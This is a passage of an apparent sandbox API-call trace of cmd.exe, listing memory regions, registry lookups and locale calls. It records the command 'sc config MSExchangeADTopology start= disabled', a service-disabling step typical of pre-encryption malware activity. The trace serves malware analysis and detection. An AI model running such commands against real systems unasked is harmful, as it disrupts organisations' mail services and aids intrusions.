os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9359 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9360 start_va = 0xdb0000 end_va = 0x4daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 9361 start_va = 0x4db0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 9362 start_va = 0x4dd0000 end_va = 0x4dd1fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 9363 start_va = 0x4de0000 end_va = 0x4df3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004de0000" filename = "" Region: id = 9364 start_va = 0x4e00000 end_va = 0x4e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 9365 start_va = 0x4e40000 end_va = 0x4f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 9366 start_va = 0x4f40000 end_va = 0x4f43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f40000" filename = "" Region: id = 9367 start_va = 0x4f50000 end_va = 0x4f50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 9368 start_va = 0x4f60000 end_va = 0x4f61fff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 9369 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9370 start_va = 0x7eb70000 end_va = 0x7eb92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb70000" filename = "" Region: id = 9371 start_va = 0x7eb9a000 end_va = 0x7eb9afff entry_point = 0x0 region_type = private name = "private_0x000000007eb9a000" filename = "" Region: id = 9372 start_va = 0x7eb9c000 end_va = 0x7eb9efff entry_point = 0x0 region_type = private name = "private_0x000000007eb9c000" filename = "" Region: id = 9373 start_va = 0x7eb9f000 end_va = 0x7eb9ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb9f000" filename = "" Region: id = 9374 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9375 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9376 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9377 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9378 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9379 start_va = 0x5050000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 9380 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9381 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9382 start_va = 0x5120000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 9383 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9424 start_va = 0x4db0000 end_va = 0x4dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004db0000" filename = "" Region: id = 9425 start_va = 0x4f70000 end_va = 0x502dfff entry_point = 0x4f70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9426 start_va = 0x5060000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 9427 start_va = 0x5220000 end_va = 0x531ffff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 9428 start_va = 0x53f0000 end_va = 0x53fffff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 9429 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9430 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9431 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9432 start_va = 0x7ea70000 end_va = 0x7eb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea70000" filename = "" Region: id = 9433 start_va = 0x7eb97000 end_va = 0x7eb99fff entry_point = 0x0 region_type = private name = "private_0x000000007eb97000" filename = "" Region: id = 9434 start_va = 0x4dc0000 end_va = 0x4dc3fff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 9435 start_va = 0x4dd0000 end_va = 0x4dd3fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 9436 start_va = 0x5400000 end_va = 0x5736fff entry_point = 0x5400000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 579 os_tid = 0xdc8 [0134.683] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0134.683] __set_app_type (_Type=0x1) [0134.683] __p__fmode () returned 0x77ac4d6c [0134.683] __p__commode () returned 0x77ac5b1c [0134.683] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0134.683] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0134.683] GetCurrentThreadId () returned 0xdc8 [0134.683] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdc8) returned 0x84 [0134.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.683] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0134.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.686] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.686] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4f3fb18 | out: phkResult=0x4f3fb18*=0x0) returned 0x2 [0134.686] VirtualQuery (in: lpAddress=0x4f3fb1f, lpBuffer=0x4f3fad0, dwLength=0x1c | out: lpBuffer=0x4f3fad0*(BaseAddress=0x4f3f000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.686] VirtualQuery (in: lpAddress=0x4e40000, lpBuffer=0x4f3fad0, dwLength=0x1c | out: lpBuffer=0x4f3fad0*(BaseAddress=0x4e40000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.686] VirtualQuery (in: lpAddress=0x4e41000, lpBuffer=0x4f3fad0, dwLength=0x1c | out: lpBuffer=0x4f3fad0*(BaseAddress=0x4e41000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.686] VirtualQuery (in: lpAddress=0x4e43000, lpBuffer=0x4f3fad0, dwLength=0x1c | out: lpBuffer=0x4f3fad0*(BaseAddress=0x4e43000, AllocationBase=0x4e40000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.686] VirtualQuery (in: lpAddress=0x4f40000, lpBuffer=0x4f3fad0, dwLength=0x1c | out: lpBuffer=0x4f3fad0*(BaseAddress=0x4f40000, AllocationBase=0x4f40000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0134.686] GetConsoleOutputCP () returned 0x1b5 [0134.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.686] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0134.686] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.686] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0134.686] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.686] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.687] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.687] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.687] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.687] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.687] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.687] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0134.687] GetEnvironmentStringsW () returned 0x5127da8* [0134.687] FreeEnvironmentStringsA (penv="A") returned 1 [0134.687] GetEnvironmentStringsW () returned 0x5127da8* [0134.687] FreeEnvironmentStringsA (penv="A") returned 1 [0134.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f3ea7c | out: phkResult=0x4f3ea7c*=0x94) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x0, lpData=0x4f3ea88*=0x28, lpcbData=0x4f3ea84*=0x1000) returned 0x2 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x1, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x0, lpData=0x4f3ea88*=0x1, lpcbData=0x4f3ea84*=0x1000) returned 0x2 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x0, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x40, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x40, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x0, lpData=0x4f3ea88*=0x40, lpcbData=0x4f3ea84*=0x1000) returned 0x2 [0134.688] RegCloseKey (hKey=0x94) returned 0x0 [0134.688] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f3ea7c | out: phkResult=0x4f3ea7c*=0x94) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x0, lpData=0x4f3ea88*=0x40, lpcbData=0x4f3ea84*=0x1000) returned 0x2 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x1, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x0, lpData=0x4f3ea88*=0x1, lpcbData=0x4f3ea84*=0x1000) returned 0x2 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x0, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x9, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x4, lpData=0x4f3ea88*=0x9, lpcbData=0x4f3ea84*=0x4) returned 0x0 [0134.688] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f3ea80, lpData=0x4f3ea88, lpcbData=0x4f3ea84*=0x1000 | out: lpType=0x4f3ea80*=0x0, lpData=0x4f3ea88*=0x9, lpcbData=0x4f3ea84*=0x1000) returned 0x2 [0134.688] RegCloseKey (hKey=0x94) returned 0x0 [0134.688] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29837 [0134.688] srand (_Seed=0x5ad29837) [0134.688] GetCommandLineW () returned="/c sc config MSExchangeADTopology start= disabled" [0134.688] GetCommandLineW () returned="/c sc config MSExchangeADTopology start= disabled" [0134.688] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5129d00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0134.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.689] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.689] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.689] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.689] GetEnvironmentStringsW () returned 0x5127da8* [0134.689] FreeEnvironmentStringsA (penv="A") returned 1 [0134.689] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.689] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.689] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.689] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.689] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.689] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.689] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.689] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.689] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.689] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f3f854 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.690] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4f3f854, lpFilePart=0x4f3f84c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f3f84c*="Desktop") returned 0x1d [0134.690] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.690] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4f3f5d0 | out: lpFindFileData=0x4f3f5d0) returned 0x51205c8 [0134.690] FindClose (in: hFindFile=0x51205c8 | out: hFindFile=0x51205c8) returned 1 [0134.690] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4f3f5d0 | out: lpFindFileData=0x4f3f5d0) returned 0x51205c8 [0134.690] FindClose (in: hFindFile=0x51205c8 | out: hFindFile=0x51205c8) returned 1 [0134.690] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0134.690] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4f3f5d0 | out: lpFindFileData=0x4f3f5d0) returned 0x51205c8 [0134.690] FindClose (in: hFindFile=0x51205c8 | out: hFindFile=0x51205c8) returned 1 [0134.690] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.690] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0134.690] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0134.691] GetEnvironmentStringsW () returned 0x5127da8* [0134.691] FreeEnvironmentStringsA (penv="=") returned 1 [0134.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.691] GetConsoleOutputCP () returned 0x1b5 [0134.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.691] GetUserDefaultLCID () returned 0x409 [0134.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4f3f984, cchData=128 | out: lpLCData="0") returned 2 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4f3f984, cchData=128 | out: lpLCData="0") returned 2 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4f3f984, cchData=128 | out: lpLCData="1") returned 2 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0134.692] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0134.692] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.692] GetConsoleTitleW (in: lpConsoleTitle=0x512aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.693] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.693] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0134.693] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0134.693] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0134.693] _wcsicmp (_String1="sc", _String2=")") returned 74 [0134.693] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0134.693] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0134.693] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0134.693] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0134.693] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0134.693] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0134.694] GetConsoleTitleW (in: lpConsoleTitle=0x4f3f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.694] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0134.694] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0134.694] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0134.694] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0134.694] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0134.695] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0134.695] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0134.695] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0134.695] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0134.695] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0134.695] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0134.695] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0134.695] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0134.695] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0134.695] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0134.695] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0134.695] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0134.695] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0134.695] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0134.695] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0134.695] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0134.695] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0134.695] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0134.695] _wcsicmp (_String1="sc", _String2="START") returned -17 [0134.695] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0134.695] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0134.695] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0134.695] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0134.695] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0134.695] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0134.695] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0134.695] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0134.695] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0134.695] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0134.695] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0134.695] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0134.695] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0134.695] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0134.695] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0134.695] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0134.695] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0134.695] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0134.695] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0134.695] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0134.695] 